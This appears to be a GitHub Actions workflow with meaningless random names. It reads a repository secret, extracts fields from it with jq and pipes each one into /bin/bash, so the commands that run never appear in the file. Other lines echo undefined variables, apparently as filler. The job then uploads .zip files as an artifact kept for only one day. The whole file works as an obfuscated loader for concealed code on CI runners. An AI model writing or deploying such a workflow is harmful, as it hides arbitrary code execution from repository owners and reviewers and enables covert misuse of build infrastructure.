name: gabrieldryw165
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gabrieldryw165
        env:
          t6486: ${{ secrets.t6486 }}
        run: |
          printf '%s' "$t6486" | jq -r .sg51930 | /bin/bash
          echo $gs52 | jq -r .mx3 | /bin/bash
          printf '%s' "$ovmwp98440" | jq -r .qhsfx214 | /bin/bash
          echo $i9 | jq -r .dfw138 | /bin/bash
          echo $lar727 | jq -r .rtdr69 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: AuEU0YLz
          path: "*.zip"
          retention-days: 1
